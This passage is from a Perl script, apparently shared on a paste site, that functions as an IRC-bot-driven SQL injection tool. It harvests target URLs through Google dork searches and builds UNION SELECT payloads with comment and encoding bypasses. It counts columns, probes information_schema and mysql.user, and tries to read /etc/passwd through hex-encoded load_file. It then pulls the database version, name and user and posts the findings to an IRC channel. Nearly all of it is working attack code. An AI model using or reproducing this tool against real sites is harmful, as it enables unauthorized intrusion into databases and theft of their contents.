  725. . $pass1
  726. . "select"
  727. . $pass1 . "666"
  728. . $pass2 );
  729. if ( $code1 =~
  730. /The used SELECT statements have a different number of columns/ig )
  731. {
  732. my $path = $1;
  733. chomp $path;
  734. $alert = "char(" . ascii("RATSXPDOWN1RATSXPDOWN") . ")";
  735. $total = "1";
  736. for my $rows ( 2 .. 52 ) {
  737. $asc .= "," . "char("
  738. . ascii( "RATSXPDOWN" . $rows . "RATSXPDOWN" ) . ")";
  739. $total .= "," . $rows;
  740. $injection =
  741. $page . "-1"
  742. . $pass1 . "union"
  743. . $pass1
  744. . "select"
  745. . $pass1
  746. . $alert
  747. . $asc;
  748. $test = toma($injection);
  749. if ( $test =~ /RATSXPDOWN/ ) {
  750. @number = $test =~ m{RATSXPDOWN(\d+)RATSXPDOWN}g;
  751. print $soquete "PRIVMSG $canal : [Page] : $page\r\n";
  752. print $soquete
  753. "PRIVMSG $canal : [Limit] : The site has $rows columns\r\n";
  754. print $soquete
  755. "PRIVMSG $canal : [Data] : The number @number print data\r\n";
  756. if ( $test =~ /RATSXPDOWN(\d+)/ ) {
  757. if ($path) {
  758. print $soquete
  759. "PRIVMSG $canal : [Full Path Discloure] : $path\r\n";
  760. }
  761. $total =~ s/@number[0]/hackman/;
  762. print $soquete "PRIVMSG $canal : [+] Injection SQL : "
  763. . $page . "-1"
  764. . $pass1 . "union"
  765. . $pass1
  766. . "select"
  767. . $pass1
  768. . $total . "\r\n";
  769. &details(
  770. $page . "-1"
  771. . $pass1 . "union"
  772. . $pass1
  773. . "select"
  774. . $pass1
  775. . $total,
  776. $_[1]
  777. );
  778. last;
  779. }
  780. }
  781. }
  782. }
  783. }
  784.  
  785. sub details {
  786. my $page = $_[0];
  787. ( $pass1, $pass2 ) = &bypass( $ARGV[1] );
  788. if ( $page =~ /(.*)hackman(.*)/ig ) {
  789. my $start = $1;
  790. my $end = $2;
  791. $test1 =
  792. toma( $start
  793. . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
  794. . $end
  795. . $pass1 . "from"
  796. . $pass1
  797. . "information_schema.tables"
  798. . $pass2 );
  799. $test2 =
  800. toma( $start
  801. . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
  802. . $end
  803. . $pass1 . "from"
  804. . $pass1
  805. . "mysql.user"
  806. . $pass2 );
  807. $test3 =
  808. toma( $start
  809. . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))"
  810. . $end
  811. . $pass2 );
  812. if ( $test2 =~ /ERTOR854/ig ) {
  813. print $soquete "PRIVMSG $canal : [+] MYSQL User : ON\r\n";
  814. }
  815. if ( $test1 =~ /ERTOR854/ig ) {
  816. print $soquete
  817. "PRIVMSG $canal : [+] information_schema : ON\r\n";
  818. }
  819. if ( $test3 =~ /ERTOR854/ig ) {
  820. print $soquete "PRIVMSG $canal : [+] load_file : ON\r\n";
  821. }
  822. $code =
  823. toma( $start
  824. . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))"
  825. . $end
  826. . $pass2 );
  827. if ( $code =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g ) {
  828. print $soquete "PRIVMSG $canal : [!] DB Version : $1\r\n";
  829. print $soquete "PRIVMSG $canal : [!] DB Name : $2\r\n";
  830. print $soquete "PRIVMSG $canal : [!] user_name : $3\r\n";
  831. }
  832. else {
  833. print $soquete "PRIVMSG $canal : [-] Not found any data\r\n";
  834. }
  835. print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
  836. }
  837. }
  838. }
  839.  
  840. sub bypass {
  841. if ( $_[0] eq "/*" ) { return ( "/**/", "/*" ); }
  842. elsif ( $_[0] eq "%20" ) { return ( "%20", "%00" ); }
  843. else { return ( "+", "--" ); }
  844. }
  845.  
  846. sub ascii {
  847. return join ',', unpack "U*", $_[0];
  848. }
  849.  
  850. sub ascii_de {
  851. $_[0] = join q[], map { chr } split q[,], $_[0];
  852. return $_[0];
  853. }
  854.  
  855. sub encode {
  856. my $string = $_[0];
  857. $hex = '0x';
  858. for ( split //, $string ) {
  859. $hex .= sprintf "%x", ord;
  860. }
  861. return $hex;
  862. }
  863.  
  864. sub decode {
  865. $_[0] =~ s/^0x//;
  866. $encode = join q[], map { chr hex } $_[0] =~ /../g;
  867. return $encode;
  868. }
  869.  
  870. sub google {
  871. my ( $a, $b ) = @_;
  872. for ( $pages = 10 ; $pages <= $b ; $pages = $pages + 10 ) {
  873. $code = toma(
  874. "http://www.google.com.ar/search?hl=&q=" . $a . "&start=$pages" );
  875. my @links = get_links($code);
  876. for my $l (@links) {
  877. if ( $l =~ /webcache.googleusercontent.com/ ) {
  878. push( @url, $l );
  879. }
  880. }
  881. }
  882. for (@url) {
  883. if ( $_ =~ /cache:(.*?):(.*?)\+/ ) {
  884. push( @founds, $2 );
  885. }
  886. }
  887. my @founds = repes( cortar(@founds) );
  888. return @founds;
  889. }
  890.  
  891. sub repes {
  892. my @limpio;
  893. foreach $test (@_) {
  894. push @limpio, $test unless $repe{$test}++;
  895. }
  896. return @limpio;
  897. }
  898.  
  899. sub cortar {
  900. my @nuevo;
  901. for (@_) {
  902. if ( $_ =~ /=/ ) {
  903. @tengo = split( "=", $_ );
  904. push( @nuevo, @tengo[0] . "=" );
  905. }
  906. else {
  907. push( @nuevo, $_ );
  908. }
  909. }
  910. return @nuevo;
  911. }
  912.  
  913. sub get_links {
  914. $test = HTML::LinkExtor->new( \&agarrar )->parse( $_[0] );
  915. return @links;
  916.  
  917. sub agarrar {
  918. my ( $a, %b ) = @_;
  919. push( @links, values %b );
  920. }
  921. }
  922.  
  923. sub toma {
  924. return $nave->request( GET $_[0] )->content;
  925. }
  926.  
  927. sub tomax {
  928. return $nave->request( GET $_[0] );
  929. }
  930.  
  931. # The End ?
Add Comment
Please, Sign In to add comment